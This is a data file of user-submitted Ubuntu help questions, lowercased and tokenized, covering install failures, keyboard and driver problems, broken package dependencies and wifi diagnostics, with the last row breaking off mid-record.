504719	can not install 14.04	i am on an old windows 7 64 bit pc/ i can run and install the 10. , 12.but not the 13. and 14.04.l ? ? oh , the 13 is a 13.04 not 13.10 ... could i change something in ( services ) that will allow me to install 14.04.l ? anything ... .. ; ) i even tried to wipe windows and install ubuntu but then i could n't reload windows ... . having loads of fun here people lol ; ( i know !
504720	ubuntu , ca n't use @	i got an problem with my ubuntu 12.04 , ran in a virtualbox on windows 7 . like the title already said i ca n't use @ . this one is just copy 'n paste . the problem also concerns the pipe and tilde , i ca n't use any of these three . my keyboard is a german 104 keys generic keyboard . i already tried to fix this in the settings , which are provided by ubuntu . it did n't work for me . i tried to go with sudo dpkg-reconfigure keyboard-configuration aswell , i gave every option i could use a try , but it did n't work at all . creating an xorg.conf did n't solve the problem either . the only positive thing is that i can use nearly every special character in the console , but not in the browser or in any other application . if you should need any additional information to help me , i will provide it as soon as i can get my hands on it ! content of setxkbmap -v -query : trying to build keymaps using the following components : keycodes : evdev+aliases ( qwertz ) types : complete compat : complete symbols : pc+de+inet ( evdev ) geometry : pc ( pc104 ) rules : evdev model : pc104 layout : de conten of locale : lang=de_de.utf-8 language=de_de lc_type= '' de_de.utf-8 '' lc_numeric= '' de_de.utf-8 '' lc_time= '' de_de.utf-8 '' lc_collate= '' de_de.utf-8 '' lc_monetary= '' de_de.utf-8 '' lc_messages= '' de_de.utf-8 '' lc_paper= '' de_de.utf-8 '' lc_name= '' de_de.utf-8 '' lc_address= '' de_de.utf-8 '' lc_telephone= '' de_de.utf-8 '' lc measurement= '' de_de.utf-8 '' lc_identification= '' de_de.utf-8 '' lc_all=
504724	ubuntu 14.04.1 lts and openssl	does ubuntu ubuntu 14.04.1 lts have any openssl vulnerabilities in connection with the heartbleed bug ? i downloaded the iso today and i am installing it and i would like to know if there are any existing vulnerabilities .
504731	how to fix ubuntu 14.04 update manager	how to fix ubuntu 14.04 update-manager as i have problems with this : w : fail to find http : //archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/source/sources 404 not found /universe/source/sources 404 not found /multiverse/bynary-i386/packages 404 not found w : fail to find http : //ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/trusty/main/source/sources 404 npot found /main/binary-i386/packages 404 not found
504733	from gnome-screenshot command line , how do you predefine the are ?	so gnome-screenshot has the following options : tim @ hairy14 : ~ $ gnome-screenshot -- help usage : gnome-screenshot [ option… ] take a picture of the screen help options : -h , -- help show help options -- help-all show all help options -- help-gtk show gtk+ options application options : -c , -- clipboard send the grab directly to the clipboard -w , -- window grab a window instead of the entire screen -a , -- area grab an area of the screen instead of the entire screen -b , -- include-border include the window border with the screenshot -b , -- remove-border remove the window border from the screenshot -p , -- include-pointer include the pointer with the screenshot -d , -- delay=seconds take screenshot after specified delay [ in seconds ] -e , -- border-effect=effect effect to add to the border ( shadow , border , vintage or none ) -i , -- interactive interactively set options -f , -- file=filename save screenshot directly to this file -- version print version information and exit -- display=display x display to use the one i 'm interested in is -a . if it run it , the following happens , i can click and drag anywhere on the screen and it saves an image , of the are i chose . i have the short cut alt+shift+4 set up for this . but what i want is a predefined area , somehting allong the lines of this : gnome-screenshot -a 400x500+100x100 ( i.e . 400 down , 500 in and 100x100 area ) . is this possible , and is there a command to do this ? nb : i could use the image cropping tool convert -crop like this : convert -crop 100x100+50+50 pictures/screenshot.png pictures/screenshot-cropped.png but i would like it if it was built in , as cropping a full print screen makes it blurry ...
504734	meta package for ubuntu gnome edition ?	all other editions have meta packages , e.g . xubuntu-desktop , is there such package for ubuntu gnome edition ? if not , what 's the best way of replicating ubuntu gnome experience having a standard unity 14.04 install ?
504735	objects fade away on desktop on ubuntu 14.04 , after reinstalling nvidia 340.24 driver	after installing the nvidia proprietary 340.24 driver , i 've got flickering objects on the screen . i decided to reinstall the driver availble on the repositories and now i get everything fading out , returning to light only when i pass the mouse over . what is the problem and waht can be done ?
504738	need help extracting 280 rar files located within 280 folders	i hope this does n't break rule 2 . i have a bunch of folders that all have a .rar in them and i need to extract all the files and place them in one directory . is there an easier way to do this than by going into each directory individually ? what it looks like : /dira -- -- > rar1 ; /dirb -- -- > rar2 ; /dirc -- -- > rar3 etc ...
504742	install rdekstop 1.8.1 from repository or ppa in ubuntu 14.04	i am using ubuntu 14.04 and the rdekstop version in the repository seems to be 1.7.1 . according to rdekstop sourcefourge page 1.7.1 seems to pretty old and there are newer versions since 2012 . i am having some problems with the current version and few people have suggested that it is fixed in later versions . i can see that there is information available to install later version via a ppa in ubuntu 13.10/13.04/12.04 , but i could not find anything for 14.04 . how can i install it on 14.04 without having to compile/build it myself ?
504744	show desktop icon moves to the bottom after app instalation	i have added `` show desktop '' to the launcher and placed it at the top . if i install a new app using usc its icon appears at the top of the launcher and `` show desktop '' goes to the very bottom . is there a way of preventing this ?
504747	how to get a working catalyst center ?	i 've installed amd drivers using the additional driver utility , but i am unable to get the catalyst control center to launch - after i input my password , no other window comes up . additional detail : this is a zbook 14 , so the graphics are a hybrid intelâž hd graphics 4400 & amd fireproâ˘ m4100 . doing sudo amdcccle from the terminal does launch it , but i 'd like the unity launcher option to work properly .
504749	is using nvidia optimus worth it ?	i have a laptop with the optimus technology by nvidia . i do not play graphically demanding games , so i am wandering if i should go through the trouble of making it all work . what is the card useful for ? i watch videos , but i have not seen any stuttering yet . i sometimes encode videos , so i guess there it would be useful . what other uses the discreete card might have ? if i understand it correctly , it eats more energy then the intergrated solution , so if i do not see any stuttering , i am better off without it , or am i missing something ?
504754	data recovery is it possible : ubuntu chrome os acer 710	i know it is tricky and only a bunch of people out there with acer chrome book c710 running ubuntu . following is the situation . i installed ubuntu lts 12.04 on acer chromebook . fantastic ! . i stored lot of images family pictures and videos and documents . accidentally some one at my home pushed the space bar while booting bad , all rest to chrome os , whole process of installing ubuntu was repeated . this indicates that the drive was partitioned/repartitioned and reset . is there a way to recover the data ( the pictures videos and documents ) . so far , i have not done anything other than reinstalling the ubuntu 12.04 lts . i called some data recovery companies including staples . they said as long as it is working drive , data is a data , image once created can be recovered but costs huge amount of money can anyone make suggestions to recover the pictures and videos thanks
504755	howto enable spellchecking in canadian english ( incl in libreoffice ) for all users / system-wide	it seems that no one gets the benefit of spell-checking in libreoffice on our ubuntu computers . we have them generally set up with canadian english as default languages , but apparently there is no spell checking for canadian english . the fix seems to be for each new user to do the following , within libreoffice : go to tools/options/language settings/languages . for `` default language for documents , '' pick english ( usa ) or english ( uk ) . it allows dozens of flavours of english , but spelling is disabled for all the ones that do n't have the little blue tick abc icon beside them . that is not good , since in canada we have spelling that is more flexible than us or uk . however , my question is how to set this up for everyone , at the system level , so that each user does not need to figure this out ?
504756	binary crashing continuously since 12:40 gmt+1 for no reason	this file worked before that time for nearly a day . i also downloaded the binaries and tried it at home and it still worked perfectly . the error i recieve is here : ./vpk.sh : line 3 : 23707 illegal instruction ( core dumped ) /srv/www/mods.tf/vpk/vpk_linux32 `` $ @ '' i can not find the dump anywhere . /var/crash is completely empty . any help would be appreciated .
504760	lamp server image cd	i have very limited unix skills , so i say i am a rookie . i want to setup a lamp server . is there a cd image i can download that will install all of the lamp components ? this will host an ecommerce site with small amount of traffic .
504761	change yahoo ! alias in empathy	empathy displays my yahoo ! alias as a changeable string , but it does n't save my new alias and it keeps using the default ( your name before the @ sign ) image how can i change it ?
504766	help ! i need to uninstall ubuntu from single boot	hello ubuntu is really starting to piss me off now . is there no way to remove this ? i have a lenovo g505 , it wont let me boot from cd so i cant install windows from disk because ubuntu gives me some stupid error that it cant read the disk . ive tried changing thje bios settings too and nothing works . ive tried using gparted and that does not help either . how can i hget rid of this piece of shit i have single boot so no dual boot tutorials please . any help will be appreciated
504768	apt-get install -f fails	not sure what to do with this , apt-get dist-upgrade was the reason i want to run this , it says unresolved dependencies.. apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : initramfs-tools libc6-dev suggested packages : glibc-doc the following packages will be upgraded : initramfs-tools libc6-dev 2 upgraded , 0 newly installed , 0 to remove and 1292 not upgraded . 27 not fully installed or removed . need to get 0 b/1,955 kb of archives . after this operation , 553 kb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of initramfs-tools : initramfs-tools depends on initramfs-tools-bin ( < < 0.99ubuntu13.1~ ) ; however : version of initramfs-tools-bin on system is 0.103ubuntu4.2 . klibc-utils ( 2.0.3-0ubuntu1 ) breaks initramfs-tools ( < < 0.103 ) and is installed . version of initramfs-tools to be configured is 0.99ubuntu13 . dpkg : error processing initramfs-tools ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of udev : udev depends on initramfs-tools ( > = 0.92bubuntu63 ) ; however : package initramfs-tools is not configured yet . dpkg : error processing udev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth : plymouth depends on udev ( > = 166-0ubuntu4 ) ; however : package udev is not configured yet . plymouth depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing plymouth ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mountall : mountall depends on udev ; however : package udev is not configured yet . mountall depends on plymouth ; however : package plymouth is not configured yet . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already dpkg : error processing mountall ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of initscripts : initscripts depends on mountall ( > = 2.28 ) ; however : package mountall is not configured yet . dpkg : error processing initscripts ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of upstart : upstart depends on initscripts ; however : no apport report written because maxreports is reached already package initscripts is not configured yet . upstart depends on mountall ; however : package mountall is not configured yet . dpkg : error processing upstart ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of passwd : passwd depends on upstart-job ; however : package upstart-job is not installed . package upstart which provides upstart-job is not configured yet . dpkg : error processing passwd ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of dmsetup : dmsetup depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dmsetup depends on udev ( > > 141-2 ) ; however : package udev is not configured yet . dpkg : error processing dmsetup ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of cron : cron depends on upstart-job ; however : package upstart-job is not installed . package upstart which provides upstart-job is not configured yet . dpkg : error processing cron ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of dbus : dbus depends on upstart-job ; however : package upstart-job is not installed . package upstart which provides upstart-job is not configured yet . dbus depends on upstart ( > = 0.6.3-6 ) ; however : package upstart is not configured yet . dpkg : error processing dbus ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of accountsservice : accountsservice depends on dbus ; however : package dbus is not configured yet.no apport report written because maxreports is reached already dpkg : error processing accountsservice ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of dbus-x11 : dbus-x11 depends on dbus ; however : package dbus is not configured yet . dpkg : error processing dbus-x11 ( -- configure ) : no apport report written because maxreports is reached already no apport report written because maxreports is reached already dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of policykit-1 : policykit-1 depends on dbus ; however : package dbus is not configured yet . dpkg : error processing policykit-1 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of policykit-1-gnome : policykit-1-gnome depends on policykit-1 ; however : package policykit-1 is not configured yet . dpkg : error processing policykit-1-gnome ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libnm-gtk0 : libnm-gtk0 depends on policykit-1-gnome ; however : package policykit-1-gnome is not configured yet . libnm-gtk0 depends on dbus-x11 ; however : no apport report written because maxreports is reached already package dbus-x11 is not configured yet . dpkg : error processing libnm-gtk0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ubuntu-system-service : ubuntu-system-service depends on policykit-1 ; however : no apport report written because maxreports is reached already package policykit-1 is not configured yet . dpkg : error processing ubuntu-system-service ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gnome-control-center : gnome-control-center depends on libnm-gtk0 ; however : package libnm-gtk0 is not configured yet . gnome-control-center depends on accountsservice ; however : package accountsservice is not configured yet . gnome-control-center depends on ubuntu-system-service ( > = 0.1.10 ) ; however : package ubuntu-system-service is not configured yet . dpkg : error processing gnome-control-center ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libc6-dev : libc6-dev depends on libc6 ( = 2.15-0ubuntu10.5 ) ; however : version of libc6 on system is 2.19-0ubuntu6 . libc6-dev depends on libc-dev-bin ( = 2.15-0ubuntu10.5 ) ; however : version of libc-dev-bin on system is 2.19-0ubuntu6 . dpkg : error processing libc6-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth-label : plymouth-label depends on plymouth ( = 0.8.2-2ubuntu31.1 ) ; however : no apport report written because maxreports is reached already package plymouth is not configured yet . dpkg : error processing plymouth-label ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of rhythmbox : rhythmbox depends on dbus ; however : package dbus is not configured yet . dpkg : error processing rhythmbox ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugin-cdrecorder : rhythmbox-plugin-cdrecorder depends on rhythmbox ( = 2.96-0ubuntu4.3 ) ; however : package rhythmbox is not configured yet.no apport report written because maxreports is reached already dpkg : error processing rhythmbox-plugin-cdrecorder ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugin-zeitgeist : rhythmbox-plugin-zeitgeist depends on rhythmbox ( > = 2.96-0ubuntu4.3 ) ; however : package rhythmbox is not configured yet.no apport report written because maxreports is reached already rhythmbox-plugin-zeitgeist depends on rhythmbox ( < < 2.97 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-plugin-zeitgeist ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of rhythmbox-mozilla : rhythmbox-mozilla depends on rhythmbox ( = 2.96-0ubuntu4.3 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-mozilla ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugin-magnatune : rhythmbox-plugin-magnatune depends on rhythmbox ( = 2.96-0ubuntu4.3 ) ; however : package rhythmbox is not configured yet.no apport report written because maxreports is reached already dpkg : error processing rhythmbox-plugin-magnatune ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugins : rhythmbox-plugins depends on rhythmbox ( = 2.96-0ubuntu4.3 ) ; however : no apport report written because maxreports is reached already package rhythmbox is not configured yet . dpkg : error processing rhythmbox-plugins ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of xserver-xorg-core : xserver-xorg-core depends on udev ( > = 149 ) ; however : package udev is not configured yet . dpkg : error processing xserver-xorg-core ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libdevmapper1.02.1 : libdevmapper1.02.1 depends on dmsetup ( > = 2:1.02.48-4ubuntu7.3 ) ; however : no apport report written because maxreports is reached already package dmsetup is not configured yet . dpkg : error processing libdevmapper1.02.1 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : initramfs-tools udev plymouth mountall initscripts upstart passwd dmsetup cron dbus accountsservice dbus-x11 policykit-1 policykit-1-gnome libnm-gtk0 ubuntu-system-service gnome-control-center libc6-dev plymouth-label rhythmbox rhythmbox-plugin-cdrecorder rhythmbox-plugin-zeitgeist rhythmbox-mozilla rhythmbox-plugin-magnatune rhythmbox-plugins xserver-xorg-core libdevmapper1.02.1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) my sources.list # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //ca.archive.ubuntu.com/ubuntu/ trusty main restricted deb-src http : //ca.archive.ubuntu.com/ubuntu/ trusty main restricted # deb http : //dl.hiphop-php.com/ubuntu trusty main # disabled on upgrade to trusty deb http : //archive.ubuntu.com/ubuntu trusty main universe # # major bug fix updates produced after the final release of the # # distribution . deb http : //ca.archive.ubuntu.com/ubuntu/ trusty-updates main restricted deb-src http : //ca.archive.ubuntu.com/ubuntu/ trusty-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //ca.archive.ubuntu.com/ubuntu/ trusty universe deb-src http : //ca.archive.ubuntu.com/ubuntu/ trusty universe deb http : //ca.archive.ubuntu.com/ubuntu/ trusty-updates universe deb-src http : //ca.archive.ubuntu.com/ubuntu/ trusty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //ca.archive.ubuntu.com/ubuntu/ trusty multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ trusty multiverse deb http : //ca.archive.ubuntu.com/ubuntu/ trusty-updates multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ trusty-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //ca.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu trusty-security main restricted deb-src http : //security.ubuntu.com/ubuntu trusty-security main restricted deb http : //security.ubuntu.com/ubuntu trusty-security universe deb-src http : //security.ubuntu.com/ubuntu trusty-security universe deb http : //security.ubuntu.com/ubuntu trusty-security multiverse deb-src http : //security.ubuntu.com/ubuntu trusty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //extras.ubuntu.com/ubuntu trusty main
504769	ca n't acces admin account , how may i fix it ?	so when i try to log into the admin account i go right back to the log-in screen . and i 've been searching around all over the internet trying to fix it , but then some other problems always comes along , how may i fix it ?
504770	whenever i try installing something from the software center it always says 'requires installation of untrusted packages '	i am using software server 12.04 but whenever i try installing something like playonlinux for example it says requires installation of untrusted packages and when i click details it gives me : fonts-droid fonts-horai-umefont fonts-unfonts-core gnome-exe-thumbnailer icoutils libcapi20-3 libmpg123-0 libpam-winbind libwbclient0 mesa-utils playonlinux python-wxgtk2.8 python-wxversion samba-common smbclient ttf-droid ttf-umefont ttf-unfonts-core winbind wine wine-gecko1.4 wine1.4 wine1.4-common wine1.4-i386 winetricks
504771	new to ubuntu-ca n't find panel and other problems ?	i 'm running ubuntu 14.04 in a virtual machine ( vmware to be precise ) , and all i have is a desktop . i 've managed to create a new folder and document , but i ca n't move windows , access the panel/taskbar , or open anything besides file explorer and system settings . i have no taskbar/clock , ctrl+alt+tab and ctrl+alt+t do n't open command lines , i 've adjusted where to mouse over for sidebar to appear and that has n't helped ... i pretty much have a 20gb desktop background that can save files . i 'm sure i 'm doing something wrong , but what ?
504777	unstable wireless connection in ubuntu 14.04	i have recently upgraded to 14.04 , and i have realized that after certain periods of time from connecting to a wifi network , my computer suddenly disconnects and i have to disable and then enable wifi again to connect . this is a major issue for me especially when downloading files . any fixes ? i have already tried disabling ipv6 as some posts suggested in addition to other fixes . please help , my computer runs 64 bit . here is the result of running the script : # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux bilal-satellite-c655d 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:8181 ] kernel driver in use : rtl8192ce 06:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8152 v1.1 fast ethernet [ 1969:2060 ] ( rev c1 ) subsystem : toshiba america info systems device [ 1179 : ff1e ] kernel driver in use : atl1c # # # # # lsusb # # # # # bus 003 device 002 : id 10f1:1a34 importek bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : phy0 : wireless lan soft blocked : no hard blocked : no # # # # # lsmod # # # # # rtl8192ce 53550 0 rtl_pci 26690 1 rtl8192ce rtlwifi 63475 2 rtl_pci , rtl8192ce rtl8192c_common 53172 1 rtl8192ce mac80211 630653 3 rtl_pci , rtlwifi , rtl8192ce cfg80211 484040 2 mac80211 , rtlwifi # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # wlan0 ieee 802.11bgn essid : '' b d home '' mode : managed frequency:2.462 ghz access point : < mac address removed > bit rate=18 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=48/70 signal level=-62 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:81 missed beacon:0 # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : atl1c state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 [ b d home ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192ce state : connected default : yes hw address : < mac address removed > capabilities : speed : 18 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) bluesky : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 54 wpa2 name fa9911 . : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 40 wpa wpa2 moaaz : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 34 wpa fadi : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 34 wpa mikrotik-a60863 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 30 wpa wpa2 free set up 186kb 15 $ 70.926915 : infra , < mac address removed > , freq 2462 mhz , rate 11 mb/s , strength 27 fre set 512kb 25 $ 70.926915 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 27 for internet cafe 33 $ 70.926915 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 40 fre set 512/512 25 $ 71/566484 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 37 fre set 2mb/1.5m 45 $ 71/566484 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 37 phone 10 $ unlimited 70.926915 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 37 fre set 384/384 20 $ 71/566484 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 34 network cafe 44 $ 71/566484 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 30 new for dealers acc 8 $ 70.926915 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 37 fre set 384kb 20 $ 70.926915 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 37 *b d home : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 56 wpa wpa2 fre set 1m 33 $ 70.926915 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 37 ipv4 settings : address : 192.168.1.2 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # wlan0 scan completed : cell 01 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=46/70 signal level=-64 dbm encryption key : on essid : '' b d home '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=000000054e91bcb4 extra : last beacon : 64ms ago ie : unknown : 000842204420484f4d45 ie : unknown : 010882848b962430486c ie : unknown : 03010b ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : dd090010180204f0000000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk cell 02 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=32/70 signal level=-78 dbm encryption key : off essid : '' new for dealers acc 8 $ 70.926915 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000001674f6459ac extra : last beacon : 4264ms ago ie : unknown : 00206e657720666f72206465616c657273206163632038242037302e393236393135 ie : unknown : 010882848b960c121824 ie : unknown : 030101 ie : unknown : 050400010000 ie : unknown : 2a0100 ie : unknown : 32043048606c ie : unknown : dd2a000c42000000011e00000000006614030000303030323646363941423533000000000000000005026c09 cell 03 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=32/70 signal level=-78 dbm encryption key : off essid : '' fre set 384kb 20 $ 70.926915 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000001674f645f12 extra : last beacon : 4264ms ago ie : unknown : 001b66726520736574203338346b62203230242037302e393236393135 ie : unknown : 010882848b960c121824 ie : unknown : 030101 ie : unknown : 050400010000 ie : unknown : 2a0100 ie : unknown : 32043048606c ie : unknown : dd2a000c42000000011e00000000006614030000303030323646363941423533000000000000000005026c09 cell 04 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=32/70 signal level=-78 dbm encryption key : off essid : '' fre set 2.5mb 45 $ 70.926915 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000001674f64644e extra : last beacon : 4260ms ago ie : unknown : 001b6672652073657420322e356d62203435242037302e393236393135 ie : unknown : 010882848b960c121824 ie : unknown : 030101 ie : unknown : 050400010000 ie : unknown : 2a0100 ie : unknown : 32043048606c ie : unknown : dd2a000c42000000011e00000000006614030000303030323646363941423533000000000000000005026c09 cell 05 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=38/70 signal level=-72 dbm encryption key : on essid : '' bluesky '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000000323d91340 extra : last 